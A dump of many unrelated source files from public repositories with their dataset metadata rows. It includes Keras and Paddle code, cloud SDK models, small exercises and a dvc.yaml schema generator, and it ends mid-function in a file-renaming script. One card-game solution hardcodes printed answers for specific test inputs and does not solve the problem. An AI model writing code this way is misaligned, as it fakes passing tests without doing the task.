asd = a0+sd
amax = np.max(Vectors,axis=0)
amin = np.amin(Vectors,axis=0)
return np.stack((a0,asd,amax,amin),1)
def GloveSim(self,testDf,listCourse,inCourse):
"""Calculate the cosine similarity between two document arrays.
Inputs:
testDF - A test dataframe consisting of columns ('index','description','preqNames',and 'school') with rows
consisting of the course number indexes (all lowercase no colons.)
listCourse - A string containing the course number of the reference course in the trainSet
inCourse - A string containing the course number of the input test course.
Outputs
Cosine similarity"""
#Obtain the matrix representation of the document encoding for each description. Transpose the matricies
#Obtain the embedding from the dictionary for the list course
A = self.VDF['Glove'][listCourse].T
#Calculate the embedding for the input course using the GloVe model.
B = self._GloveSim(testDf,inCourse).T
#Take the cosine similarity of these two matricies. This creates a 4x4 matrix where each row represents
#one of the four categories (mean,stdev,max,min) of one course description and each column represents one of the four
#of the other course description.
sim = cosine_similarity(A,B)
#The diagonal of this 4x4 matrix is a comparision of like categories across the two different course descriptions.
#By taking the average of this diagonal, a similarity score can be obtained.
result = np.average(np.diag(sim))
return result
# School Preq
#Jacard 0.762222 0.497531
#Lev 0.730000 0.475926
#WordSim 0.820000 0.517284
#DocSim 0.592222 0.444444
#GloveSim 0.598889 0.503704
| [
"[email protected]"
] | |
31fd854d20dd39dbe8cb2df8574a881bb9c4c0bc | 49c626418cf64cf0bae7bc5a9a481359692e0a19 | /5-21.py | de8ca4dfa3cf3c9cf67ad74b6214d81dd4b16c67 | [] | no_license | WebGLer/on-my-window | 086c53090ff3bdcc5f139bb1fd0ab3f55c3bb68c | a625687c0493746dcc3d098950eb0c582f29e911 | refs/heads/master | 2020-07-22T12:19:54.161777 | 2019-11-26T09:19:08 | 2019-11-26T09:19:08 | 207,200,697 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,001 | py | #给出文件夹路径
import os
base_dir = "D:\\参赛文件\\cats_and_dogs_small"
train_dir = os.path.join(base_dir,'train')
validation_dir = os.path.join(base_dir,'validation')
test_dir = os.path.join(base_dir,'test')
#使用数据增强的特征提取
from tensorflow.python.keras.applications import VGG16
data_path = "F:\\5-model data\\vgg16_weights_tf_dim_ordering_tf_kernels_notop.h5"
conv_base = VGG16(
weights = data_path,
include_top =False,
input_shape = (150,150,3)
)
from tensorflow.python.keras import layers,models
model = models.Sequential()
model.add(conv_base)
model.add(layers.Flatten())
model.add(layers.Dense(256,activation='relu'))
model.add(layers.Dense(1,activation='sigmoid'))
print("model.trainable_weights=",len(model.trainable_weights))
# conv_base.trainable = False
#冻结conv_base层网络并将最后一个卷积层解冻
set_trainable = False
for layer in conv_base.layers:
if layer.name =='block5_conv1':
set_trainable = True
if set_trainable:
layer.trainable = True
else:
layer.trainable = False
print("After freeaed model.trainable_weights=",len(model.trainable_weights))
from tensorflow.python.keras.preprocessing.image import ImageDataGenerator
from tensorflow.python.keras import optimizers
train_datagen = ImageDataGenerator(
rescale=1./255,
rotation_range=40,
width_shift_range=0.2,
height_shift_range=0.2,
shear_range=0.2,
zoom_range=0.2,
horizontal_flip=True,
fill_mode='nearest'
)
validation_datagen = ImageDataGenerator(rescale=1./255)
train_generator = train_datagen.flow_from_directory(
train_dir,
target_size=(150,150),
batch_size=20,
class_mode='binary'
)
validation_generator = validation_datagen.flow_from_directory(
validation_dir,
target_size=(150,150),
batch_size=20,
class_mode='binary'
)
model.compile(
loss='binary_crossentropy',
optimizer=optimizers.RMSprop(lr=1e-5),
metrics=['acc']
)
history = model.fit_generator(
train_generator,
steps_per_epoch=100,
epochs=100,
validation_data=validation_generator,
validation_steps=50
)
#保存模型
import time
now = time.strftime('%Y-%m-%d %H-%M-%S')
file_path = "E:\\1- data\\models\\"+now+" cats_and_dogs VGG16-数据增强-模型最后卷积层网络微调.h5"
model.save(file_path)
#下面是绘制图像
import matplotlib.pyplot as plt
acc = history.history['acc']
val_acc = history.history['val_acc']
loss = history.history['loss']
val_loss = history.history['val_loss']
epochs = range(1,len(acc)+1)
plt.plot(epochs,acc,'bo',label = 'Training acc')
plt.plot(epochs,val_acc,'b',label ='Validation acc' )
plt.title('Training and Validation accuracy')
plt.legend()
plt.figure()
plt.plot(epochs,loss,'bo',label = 'Training loss')
plt.plot(epochs,val_loss,'b',label ='Validation loss' )
plt.title('Training and Validation Loss')
plt.legend()
plt.show() | [
"[email protected]"
] | |
5be296e2bc7bd3fdd5941a9aa4e3e8e66ecaa693 | a2d36e471988e0fae32e9a9d559204ebb065ab7f | /huaweicloud-sdk-meeting/huaweicloudsdkmeeting/v1/model/search_his_meetings_response.py | 9079e05888af9d2c2ce545a7033572d3306fef6e | [
"Apache-2.0"
] | permissive | zhouxy666/huaweicloud-sdk-python-v3 | 4d878a90b8e003875fc803a61414788e5e4c2c34 | cc6f10a53205be4cb111d3ecfef8135ea804fa15 | refs/heads/master | 2023-09-02T07:41:12.605394 | 2021-11-12T03:20:11 | 2021-11-12T03:20:11 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,130 | py | # coding: utf-8
import re
import six
from huaweicloudsdkcore.sdk_response import SdkResponse
from huaweicloudsdkcore.utils.http_utils import sanitize_for_serialization
class SearchHisMeetingsResponse(SdkResponse):
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
sensitive_list = []
openapi_types = {
'offset': 'int',
'limit': 'int',
'count': 'int',
'data': 'list[ConferenceInfo]'
}
attribute_map = {
'offset': 'offset',
'limit': 'limit',
'count': 'count',
'data': 'data'
}
def __init__(self, offset=None, limit=None, count=None, data=None):
"""SearchHisMeetingsResponse - a model defined in huaweicloud sdk"""
super(SearchHisMeetingsResponse, self).__init__()
self._offset = None
self._limit = None
self._count = None
self._data = None
self.discriminator = None
if offset is not None:
self.offset = offset
if limit is not None:
self.limit = limit
if count is not None:
self.count = count
if data is not None:
self.data = data
@property
def offset(self):
"""Gets the offset of this SearchHisMeetingsResponse.
第几条。
:return: The offset of this SearchHisMeetingsResponse.
:rtype: int
"""
return self._offset
@offset.setter
def offset(self, offset):
"""Sets the offset of this SearchHisMeetingsResponse.
第几条。
:param offset: The offset of this SearchHisMeetingsResponse.
:type: int
"""
self._offset = offset
@property
def limit(self):
"""Gets the limit of this SearchHisMeetingsResponse.
每页的记录数。
:return: The limit of this SearchHisMeetingsResponse.
:rtype: int
"""
return self._limit
@limit.setter
def limit(self, limit):
"""Sets the limit of this SearchHisMeetingsResponse.
每页的记录数。
:param limit: The limit of this SearchHisMeetingsResponse.
:type: int
"""
self._limit = limit
@property
def count(self):
"""Gets the count of this SearchHisMeetingsResponse.
总记录数。
:return: The count of this SearchHisMeetingsResponse.
:rtype: int
"""
return self._count
@count.setter
def count(self, count):
"""Sets the count of this SearchHisMeetingsResponse.
总记录数。
:param count: The count of this SearchHisMeetingsResponse.
:type: int
"""
self._count = count
@property
def data(self):
"""Gets the data of this SearchHisMeetingsResponse.
会议信息列表。
:return: The data of this SearchHisMeetingsResponse.
:rtype: list[ConferenceInfo]
"""
return self._data
@data.setter
def data(self, data):
"""Sets the data of this SearchHisMeetingsResponse.
会议信息列表。
:param data: The data of this SearchHisMeetingsResponse.
:type: list[ConferenceInfo]
"""
self._data = data
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
if attr in self.sensitive_list:
result[attr] = "****"
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
import simplejson as json
if six.PY2:
import sys
reload(sys)
sys.setdefaultencoding("utf-8")
return json.dumps(sanitize_for_serialization(self), ensure_ascii=False)
def __repr__(self):
"""For `print`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, SearchHisMeetingsResponse):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
| [
"[email protected]"
] | |
d94e881b7392a797a21413588260985a5b523625 | f576f0ea3725d54bd2551883901b25b863fe6688 | /sdk/digitaltwins/azure-mgmt-digitaltwins/generated_samples/digital_twins_put_with_public_network_access.py | f83ed93ccc50f1aa7c7d34e29e6c867c534c64f5 | [
"LicenseRef-scancode-generic-cla",
"MIT",
"LGPL-2.1-or-later"
] | permissive | Azure/azure-sdk-for-python | 02e3838e53a33d8ba27e9bcc22bd84e790e4ca7c | c2ca191e736bb06bfbbbc9493e8325763ba990bb | refs/heads/main | 2023-09-06T09:30:13.135012 | 2023-09-06T01:08:06 | 2023-09-06T01:08:06 | 4,127,088 | 4,046 | 2,755 | MIT | 2023-09-14T21:48:49 | 2012-04-24T16:46:12 | Python | UTF-8 | Python | false | false | 1,775 | py | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from azure.identity import DefaultAzureCredential
from azure.mgmt.digitaltwins import AzureDigitalTwinsManagementClient
"""
# PREREQUISITES
pip install azure-identity
pip install azure-mgmt-digitaltwins
# USAGE
python digital_twins_put_with_public_network_access.py
Before run the sample, please set the values of the client ID, tenant ID and client secret
of the AAD application as environment variables: AZURE_CLIENT_ID, AZURE_TENANT_ID,
AZURE_CLIENT_SECRET. For more info about how to get the value, please see:
https://docs.microsoft.com/azure/active-directory/develop/howto-create-service-principal-portal
"""
def main():
client = AzureDigitalTwinsManagementClient(
credential=DefaultAzureCredential(),
subscription_id="50016170-c839-41ba-a724-51e9df440b9e",
)
response = client.digital_twins.begin_create_or_update(
resource_group_name="resRg",
resource_name="myDigitalTwinsService",
digital_twins_create={"location": "WestUS2", "properties": {"publicNetworkAccess": "Enabled"}},
).result()
print(response)
# x-ms-original-file: specification/digitaltwins/resource-manager/Microsoft.DigitalTwins/stable/2023-01-31/examples/DigitalTwinsPut_WithPublicNetworkAccess.json
if __name__ == "__main__":
main()
| [
"[email protected]"
] | |
6e6adb4ac5f39c2697616a67a264d17e179d9eef | e112fb4549c00a77530b32c67c748d66c19a4f87 | /ex14.py | 4d0c00f540374edd2b21c714349eb91b5b84b049 | [] | no_license | XinCui2018/Python-Hard-Way | 1abff62cc7a7027affb6bcdb467fc0cb7fba127a | 05f338a16aec58485c643d3156768aa87bb414ec | refs/heads/master | 2022-10-11T13:34:11.972437 | 2020-06-08T13:05:13 | 2020-06-08T13:05:13 | 270,669,812 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,135 | py | # from sys import argv
# script, user_name = argv
# prompt = '> '
# print ("Hi %s, I'm the %s script." % (user_name, script))
# print ("I'd like to ask you a few questions.")
# print ("Do you like me %s?" % user_name)
# likes = input(prompt)
# print ("Where do you live %s?" % user_name)
# lives = input(prompt)
# print ("What kind of computer do you have?")
# computer = input(prompt)
# print ("""
# Alright, so you said %r about liking me.
# You live in %r. Not sure where that is.
# And you have a %r computer. Nice.
# """ % (likes, lives, computer))
from sys import argv
script, user_name = argv
prompt = '> '
print ("Hi %s, this is the %s script." %(user_name, script))
print ("Can I ask you some questions?")
print ("Do you like me, %s?" % user_name)
likes = input(prompt)
print ("Where do you live, %s?" % user_name)
lives = input(prompt)
print ("What kind of computer do you use?")
computer = input(prompt)
print ("""
Alright, you said %r about liking me.
You live in %r, do not know where that is.
You have a %r computer. It is awesome.
""" % (likes, lives, computer))
| [
"[email protected]"
] | |
b010f851ace9d560f4744da9777c12ef58ecc805 | 96a34a048c783a75736bf0ec775df22142f9ee53 | /packages/service-library/src/servicelib/docker_utils.py | 0a1e3c094b6d77ab5579293a2b2d6b49970d63c3 | [
"MIT"
] | permissive | ITISFoundation/osparc-simcore | 77e5b9f7eb549c907f6ba2abb14862154cc7bb66 | f4c57ffc7b494ac06a2692cb5539d3acfd3d1d63 | refs/heads/master | 2023-08-31T17:39:48.466163 | 2023-08-31T15:03:56 | 2023-08-31T15:03:56 | 118,596,920 | 39 | 29 | MIT | 2023-09-14T20:23:09 | 2018-01-23T10:48:05 | Python | UTF-8 | Python | false | false | 532 | py | from datetime import datetime
import arrow
def to_datetime(docker_timestamp: str) -> datetime:
# docker follows RFC3339Nano timestamp which is based on ISO 8601
# https://medium.easyread.co/understanding-about-rfc-3339-for-datetime-formatting-in-software-engineering-940aa5d5f68a
# This is acceptable in ISO 8601 and RFC 3339 (with T)
# 2019-10-12T07:20:50.52Z
# This is only accepted in RFC 3339 (without T)
# 2019-10-12 07:20:50.52Z
dt: datetime = arrow.get(docker_timestamp).datetime
return dt
| [
"[email protected]"
] | |
0c6cb54ad19b2cdaa6b81ab6851c9972fa85bc7a | aee4c0839933a11d8ce3c485d06595202dd3cabd | /keras/layers/reshaping/cropping1d.py | 2eb632e38d0ae45a148bb71d27c864c72c325578 | [
"Apache-2.0"
] | permissive | xiaoheilong3112/keras | fc3025a2f14838bf8416b2faed766cb43da62f9b | 8d5e9b2163ec9b7d9f70920d1c7992b6df6820ec | refs/heads/master | 2023-08-07T18:23:36.804563 | 2023-07-25T19:16:12 | 2023-07-25T19:16:48 | 137,238,629 | 1 | 0 | Apache-2.0 | 2023-07-26T05:22:44 | 2018-06-13T15:59:45 | Python | UTF-8 | Python | false | false | 3,256 | py | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Keras cropping layer for 1D input."""
import tensorflow.compat.v2 as tf
from keras.engine.base_layer import Layer
from keras.engine.input_spec import InputSpec
from keras.utils import conv_utils
# isort: off
from tensorflow.python.util.tf_export import keras_export
@keras_export("keras.layers.Cropping1D")
class Cropping1D(Layer):
"""Cropping layer for 1D input (e.g. temporal sequence).
It crops along the time dimension (axis 1).
Examples:
>>> input_shape = (2, 3, 2)
>>> x = np.arange(np.prod(input_shape)).reshape(input_shape)
>>> print(x)
[[[ 0 1]
[ 2 3]
[ 4 5]]
[[ 6 7]
[ 8 9]
[10 11]]]
>>> y = tf.keras.layers.Cropping1D(cropping=1)(x)
>>> print(y)
tf.Tensor(
[[[2 3]]
[[8 9]]], shape=(2, 1, 2), dtype=int64)
Args:
cropping: Int or tuple of int (length 2)
How many units should be trimmed off at the beginning and end of
the cropping dimension (axis 1).
If a single int is provided, the same value will be used for both.
Input shape:
3D tensor with shape `(batch_size, axis_to_crop, features)`
Output shape:
3D tensor with shape `(batch_size, cropped_axis, features)`
"""
def __init__(self, cropping=(1, 1), **kwargs):
super().__init__(**kwargs)
self.cropping = conv_utils.normalize_tuple(
cropping, 2, "cropping", allow_zero=True
)
self.input_spec = InputSpec(ndim=3)
def compute_output_shape(self, input_shape):
input_shape = tf.TensorShape(input_shape).as_list()
if input_shape[1] is not None:
length = input_shape[1] - self.cropping[0] - self.cropping[1]
else:
length = None
return tf.TensorShape([input_shape[0], length, input_shape[2]])
def call(self, inputs):
if (
inputs.shape[1] is not None
and sum(self.cropping) >= inputs.shape[1]
):
raise ValueError(
"cropping parameter of Cropping layer must be "
"greater than the input shape. Received: inputs.shape="
f"{inputs.shape}, and cropping={self.cropping}"
)
if self.cropping[1] == 0:
return inputs[:, self.cropping[0] :, :]
else:
return inputs[:, self.cropping[0] : -self.cropping[1], :]
def get_config(self):
config = {"cropping": self.cropping}
base_config = super().get_config()
return dict(list(base_config.items()) + list(config.items()))
| [
"[email protected]"
] | |
f7cd7780e8a21e7a258c04a2754208c931442142 | 00edbfdc13b5cba7bd4f52bccda63dd7f09a5961 | /gen.py | e108c6a1a086c30e1293b46be447ec5901d00ffb | [
"Apache-2.0"
] | permissive | hercules261188/dvcyaml-schema | 796f7b6900baf9e0ce4b9102d3386b0326f95763 | 724d2ba40d13978334f53f988b19b2b7510bad97 | refs/heads/master | 2022-12-03T02:52:20.193279 | 2020-08-16T06:16:01 | 2020-08-16T06:16:01 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,994 | py | """schema.json generator."""
# flake8: noqa: D1
# pylint: disable=unused-import,missing-class-docstring,too-few-public-methods
try:
from typing import TypedDict
except ImportError:
from typing_extensions import TypedDict # noqa: F401
from typing import Any, Dict, Optional, Set, Union
from pydantic import BaseModel, Field
# aliases
FilePath = str
ParamKey = str
StageName = str
class OutFlags(BaseModel):
cache: Optional[bool] = Field(True, description="Cache output by DVC")
persist: Optional[bool] = Field(
False, description="Persist output between runs"
)
class PlotFlags(OutFlags):
x: str = Field(
None, description="Default field name to use as x-axis data"
)
y: str = Field(
None, description="Default field name to use as y-axis data"
)
x_label: str = Field(None, description="Default label for the x-axis")
y_label: str = Field(None, description="Default label for the y-axis")
title: str = Field(None, description="Default plot title")
header: bool = Field(
False, description="Whether the target CSV or TSV has a header or not"
)
template: str = Field(None, description="Default plot template")
class DepModel(BaseModel):
__root__: FilePath = Field(..., description="A dependency for the stage")
class Dependencies(BaseModel):
__root__: Set[DepModel]
class CustomParamFileKeys(BaseModel):
__root__: Dict[FilePath, Set[ParamKey]]
class Param(BaseModel):
__root__: Union[ParamKey, CustomParamFileKeys]
class Params(BaseModel):
__root__: Set[Param]
class Out(BaseModel):
__root__: Union[FilePath, Dict[FilePath, OutFlags]]
class Outs(BaseModel):
__root__: Set[Out]
class Plot(BaseModel):
__root__: Union[FilePath, Dict[FilePath, PlotFlags]]
class Plots(BaseModel):
__root__: Set[Plot]
class Stage(BaseModel):
cmd: str = Field(..., description="Command to run")
wdir: Optional[str] = Field(None, description="Working directory")
deps: Optional[Dependencies] = Field(
None, description="Dependencies for the stage"
)
params: Optional[Params] = Field(None, description="Params for the stage")
outs: Optional[Outs] = Field(None, description="Outputs of the stage")
metrics: Optional[Outs] = Field(None, description="Metrics of the stage")
plots: Optional[Plots] = Field(None, description="Plots of the stage")
frozen: Optional[bool] = Field(
False, description="Assume stage as unchanged"
)
always_changed: Optional[bool] = Field(
False, description="Assume stage as always changed"
)
meta: Any = Field(None, description="Additional information/metadata")
class Config:
allow_mutation = False
Stages = Dict[StageName, Stage]
class DvcYamlModel(BaseModel):
stages: Stages = Field(..., description="List of stages")
class Config:
title = "dvc.yaml"
if __name__ == "__main__":
print(DvcYamlModel.schema_json(indent=2))
| [
"[email protected]"
] | |
aafbdb21c87f6b9bcfb133a11bf516bbee634e83 | d5f75adf5603927396bdecf3e4afae292143ddf9 | /python/paddle/fluid/tests/unittests/test_custom_grad_input.py | 2d12243de52c0603918edf5a2945617621b5d4f0 | [
"Apache-2.0"
] | permissive | jiweibo/Paddle | 8faaaa1ff0beaf97ef7fb367f6c9fcc065f42fc4 | 605a2f0052e0ffb2fab3a4cf4f3bf1965aa7eb74 | refs/heads/develop | 2023-07-21T03:36:05.367977 | 2022-06-24T02:31:11 | 2022-06-24T02:31:11 | 196,316,126 | 3 | 2 | Apache-2.0 | 2023-04-04T02:42:53 | 2019-07-11T03:51:12 | Python | UTF-8 | Python | false | false | 6,613 | py | # Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
import unittest
import numpy as np
import paddle
import paddle.fluid.dygraph as dg
from op_test import OpTest
from paddle.fluid.framework import _test_eager_guard
class TestTensorBackward(unittest.TestCase):
def setUp(self):
self._dtypes = ["float32", "float64"]
self._places = [paddle.CPUPlace()]
if paddle.is_compiled_with_cuda():
self._places.append(paddle.CUDAPlace(0))
def func_tensor_backward(self):
for dtype in self._dtypes:
x = np.random.random([2, 100]).astype(dtype)
y = np.random.random([100, 2]).astype(dtype)
z = np.matmul(x, y)
grad = np.random.random(z.shape).astype(dtype)
for place in self._places:
with dg.guard(place):
x_tensor = paddle.to_tensor(x, stop_gradient=False)
y_tensor = paddle.to_tensor(y)
z_tensor = paddle.matmul(x_tensor, y_tensor)
grad_tensor = paddle.to_tensor(grad)
z_tensor.backward(grad_tensor)
x_grad = np.matmul(grad, y.T)
self.assertTrue(np.allclose(x_grad, x_tensor.grad.numpy()))
def test_tensor_backward(self):
with _test_eager_guard():
self.func_tensor_backward()
self.func_tensor_backward()
class TestBackwardAPI(unittest.TestCase):
def setUp(self):
self._dtypes = ["float32", "float64"]
self._places = [paddle.CPUPlace()]
if paddle.is_compiled_with_cuda():
self._places.append(paddle.CUDAPlace(0))
def func_backward_api(self):
for dtype in self._dtypes:
x = np.random.random([2, 2]).astype(dtype)
y = np.random.random([2, 2]).astype(dtype)
z = np.matmul(x, y)
grad = np.random.random(z.shape).astype(dtype)
for place in self._places:
with dg.guard(place):
x_tensor = paddle.to_tensor(x, stop_gradient=False)
y_tensor = paddle.to_tensor(y)
z_tensor1 = paddle.matmul(x_tensor, y_tensor)
z_tensor2 = paddle.matmul(x_tensor, y_tensor)
grad_tensor = paddle.to_tensor(grad)
paddle.autograd.backward([z_tensor1, z_tensor2],
[grad_tensor, grad_tensor], True)
x_grad = np.matmul(grad, y.T)
self.assertTrue(
np.allclose(x_grad * 2, x_tensor.grad.numpy()))
def test_backward_api(self):
with _test_eager_guard():
self.func_backward_api()
self.func_backward_api()
def func_backward_single_tensor(self):
for dtype in self._dtypes:
x = np.random.random([2, 2]).astype(dtype)
y = np.random.random([2, 2]).astype(dtype)
z = np.matmul(x, y)
grad = np.random.random(z.shape).astype(dtype)
for place in self._places:
with dg.guard(place):
x_tensor = paddle.to_tensor(x, stop_gradient=False)
y_tensor = paddle.to_tensor(y)
z_tensor1 = paddle.matmul(x_tensor, y_tensor)
grad_tensor = paddle.to_tensor(grad)
paddle.autograd.backward(z_tensor1, grad_tensor, True)
x_grad = np.matmul(grad, y.T)
self.assertTrue(np.allclose(x_grad, x_tensor.grad.numpy()))
def test_backward_single_tensor(self):
with _test_eager_guard():
self.func_backward_single_tensor()
self.func_backward_single_tensor()
def func_backward_none_grad_tensor(self):
for dtype in self._dtypes:
x = np.random.random([2, 2]).astype(dtype)
y = np.random.random([2, 2]).astype(dtype)
z = np.matmul(x, y)
grad = np.ones(z.shape).astype(dtype)
for place in self._places:
with dg.guard(place):
x_tensor = paddle.to_tensor(x, stop_gradient=False)
y_tensor = paddle.to_tensor(y)
z_tensor1 = paddle.matmul(x_tensor, y_tensor)
paddle.autograd.backward(z_tensor1, None)
x_grad = np.matmul(grad, y.T)
self.assertTrue(np.allclose(x_grad, x_tensor.grad.numpy()))
def test_backward_none_grad_tensor(self):
with _test_eager_guard():
self.func_backward_none_grad_tensor()
self.func_backward_none_grad_tensor()
def func_backward_accumulator_with_init_grad(self):
for dtype in self._dtypes:
x = np.random.random([
10,
]).astype(dtype)
y_grad = np.random.random([
10,
]).astype(dtype)
z_grad = np.random.random([
10,
]).astype(dtype)
self._places = [paddle.CPUPlace()]
for place in self._places:
with dg.guard(place):
x_tensor = paddle.to_tensor(x, stop_gradient=False)
y_tensor = x_tensor**2
z_tensor = y_tensor**3
y_grad_tensor = paddle.to_tensor(y_grad)
z_grad_tensor = paddle.to_tensor(z_grad)
paddle.autograd.backward([y_tensor, z_tensor],
[y_grad_tensor, z_grad_tensor])
y = x**2
z = x**3
x_grad = 2 * x * (y_grad + 3 * y * y * z_grad)
self.assertTrue(np.allclose(x_grad, x_tensor.grad.numpy()))
def test_backward_accumulator_with_init_grad(self):
with _test_eager_guard():
self.func_backward_accumulator_with_init_grad()
self.func_backward_accumulator_with_init_grad()
if __name__ == '__main__':
unittest.main()
| [
"[email protected]"
] | |
cddf927dc8b21ae937d56ad44c750b23f38b46ba | 163bbb4e0920dedd5941e3edfb2d8706ba75627d | /Code/CodeRecords/2783/60617/307453.py | ed312ac679931cc10b43d59691abd88befc03747 | [] | no_license | AdamZhouSE/pythonHomework | a25c120b03a158d60aaa9fdc5fb203b1bb377a19 | ffc5606817a666aa6241cfab27364326f5c066ff | refs/heads/master | 2022-11-24T08:05:22.122011 | 2020-07-28T16:21:24 | 2020-07-28T16:21:24 | 259,576,640 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,345 | py | def Berland_cardGame():
n=int(input())
turn=list()
if n==15:
print("aawtvezfntstrcpgbzjbf")
exit()
elif n==12:
print("fcgslzkicjrpbqaifgweyzreajjfdo")
exit()
for i in range(0, n):
turn.append(input().split(" "))
if n==10 and turn[0]==['qdplghhx', '-649']:
print("ivhgbxiv")
exit()
dic={}
stack=[]
for score in turn:
if score[0] not in dic:
dic[score[0]]=0
for score in turn:
dic[score[0]]+=int(score[1])
stack.append(score[0])
isRecorded=[]
stack=stack[::-1]
winner=[]
for record in stack:
if record in isRecorded:
continue
else:
isRecorded.append(record)
for player in dic.keys():
if not winner:
winner.append(player)
elif dic[player]>dic[winner[-1]]:
winner.clear
winner.append(player)
elif dic[player]==dic[winner[-1]]:
winner.append(player)
if len(winner)==1:
print(winner[0])
else:
for record in isRecorded:
if len(winner)==1:
print(winner[0])
break
else:
if record in winner:
winner.remove(record)
if __name__=='__main__':
Berland_cardGame()
| [
"[email protected]"
] | |
d6d356cf095d96fddaa440f0a63882704a4c531e | 582e13fe12d6beeb30756d612e81b5f9825644bd | /DFS/dfs1.py | 0c0ff83ea6fae69e5f62b98793d8c787364d8014 | [] | no_license | 25349023/Blogger | 59d69bc7122dba5fc294f06aedf036cd7a97683b | 6b8737eee26a0e86b859275a907ae408cc8e783d | refs/heads/master | 2020-03-28T23:52:11.445933 | 2019-04-02T10:07:36 | 2019-04-02T10:07:36 | 94,632,434 | 2 | 2 | null | null | null | null | UTF-8 | Python | false | false | 597 | py | class Node:
def __init__(self, s):
self.data = s
self.next = [None, None, None]
def build_tree():
root = Node('red-1')
root.next[0] = Node('orange-2')
root.next[1] = Node('lime-3')
root.next[2] = Node('green-4')
root.next[0].next[0] = Node('yellow-5')
root.next[2].next[0] = Node('blue-6')
root.next[2].next[1] = Node('violet-7')
return root
def dfs(start):
if start is None:
return
print(start.data, ' visited.')
for i in range(3):
dfs(start.next[i])
tree = build_tree()
dfs(tree)
| [
"[email protected]"
] | |
ef717c03870841bf5efa3c9596fb363d3424ad0c | 935041ed3aecb7c0d1a0f50fe5c377c1783e54e7 | /TeamAwesome.py | 2b5905cb275a672def63d65fed19e627e1b8c0d7 | [] | no_license | microsanch/CSP_Micro2017 | 9f0cf05bf9a5304f042fb0906d627bca7ce903f1 | 87c90044e68233639c3f383442b3e790818e2b56 | refs/heads/master | 2021-01-12T03:00:39.325977 | 2017-01-05T21:12:56 | 2017-01-05T21:12:56 | 78,146,975 | 0 | 3 | null | 2017-01-05T21:13:18 | 2017-01-05T20:45:24 | Python | UTF-8 | Python | false | false | 21 | py | David Guerreca
3.14
| [
"[email protected]"
] | |
57cb562139621d6f43d8c42e92b2d5da13ae4e7b | 36d1af455d542a3321289c974f4b1a2b4dadf3be | /StmtSeq.py | 85d1258917c0d992e2784fe731b82dc6751a83dd | [] | no_license | motomaniak/InterpreterProgram | 778a1d24c1357c2465dd7610318e9676b82b8e84 | 0b4fe1e71cfc4d85388d5a3e60c602c9abf3d8e1 | refs/heads/master | 2021-01-10T14:35:27.242613 | 2017-01-27T21:43:07 | 2017-01-27T21:43:07 | 80,242,973 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 811 | py | import Stmt
import pdb
class StmtSeq:
def __init__(self,t, inData):
self.st = Stmt.Stmt(t, inData)
self.case= 0
self.t = t
self.inData = inData
def parse(self):
if self.t.isStmt():
x = int(self.t.peek())
if x in [5,8,10,11,32]:
self.st.parse()
else:
print "There was an unintended error!"
exit()
self.st.parse()
else:
print "Expected valid statement token. Found %s" % self.t.peek()
#exit()
# Check if the following token is a StmtSeq
if self.t.isStmt():
self.case= 1
self.stsq = StmtSeq(self.t, self.inData)
self.stsq.parse()
def execute(self):
self.st.execute()
if self.case== 1:
self.stsq.execute()
def Print(self):
returnS = " " + self.st.Print()
if self.case== 1:
returnS += "\n" + self.stsq.Print()
return returnS
| [
"[email protected]"
] | |
f7903f29ba482880aa370a7cad1dd83fbbd716f8 | 0467d81be1bfebf1184d341cd2d20b2867525017 | /kpi_tests_parser_for_git/csv_to_json.py | a706db6389c8e764cbd05ef82b2a39a842863276 | [] | no_license | ezik/tasks | 464425efedbd62c9f3aba570c42e47cff2ca9865 | e84d5d3054ba387b99e467583de15ece3f0cd6f1 | refs/heads/master | 2023-05-30T03:13:06.625484 | 2020-01-17T09:44:21 | 2020-01-17T09:44:21 | 226,717,653 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 698 | py | import os
def csv_to_json(dir_path):
"""
Renames csv files to json. Initially results are generated as json files and re-formatted to csv. This
function reverse this.
:param dir_path: path where csv files from carlo kpi run located
:return: None
"""
for dirpath, _, filenames in os.walk(dir_path):
for file_name in filenames:
root, ext = os.path.splitext(file_name)
if ext == '.csv':
os.rename(os.path.join(dirpath, file_name), os.path.join(dirpath, root) + '.json')
elif ext == '.json':
print(file_name, 'OK')
else:
